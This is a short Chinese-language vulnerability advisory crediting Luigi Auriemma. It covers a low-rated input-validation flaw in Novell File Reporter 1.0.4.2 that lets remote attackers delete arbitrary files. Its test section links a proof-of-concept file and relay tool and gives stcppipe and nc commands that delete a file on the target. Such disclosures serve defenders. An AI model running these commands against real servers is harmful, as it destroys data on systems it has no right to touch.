漏洞起因
输入验证错误
危险等级
低
影响系统
Novell File Reporter 1.0.4.2
不受影响系统
危害
远程攻击者可以利用漏洞删除系统文件。
攻击所需条件
攻击者必须访问Novell File Reporter。
漏洞信息
Novell File Reporter可提供现有文件信息、最后访问数据时间,文件的副本信息及文件位置等网络服务器上存储的无数文件信息并可规划存储空间。
通过NAME SRS, OPERATION 4和CMD 5可能删除远程系统上的任意文件。
测试方法
http://aluigi.org/mytoolz/stcppipe.zip
http://aluigi.org/poc/nfr_2.dat
stcppipe -Y 2 SERVER 3037 1234
nc 127.0.0.1 1234 < nfr_2.dat
c:\windows\myfile.txt文件会被删除。
厂商解决方案
目前没有详细解决方案提供:
http://www.novell.com/products/file-reporter/
漏洞提供者
Luigi Auriemma
0 条评论。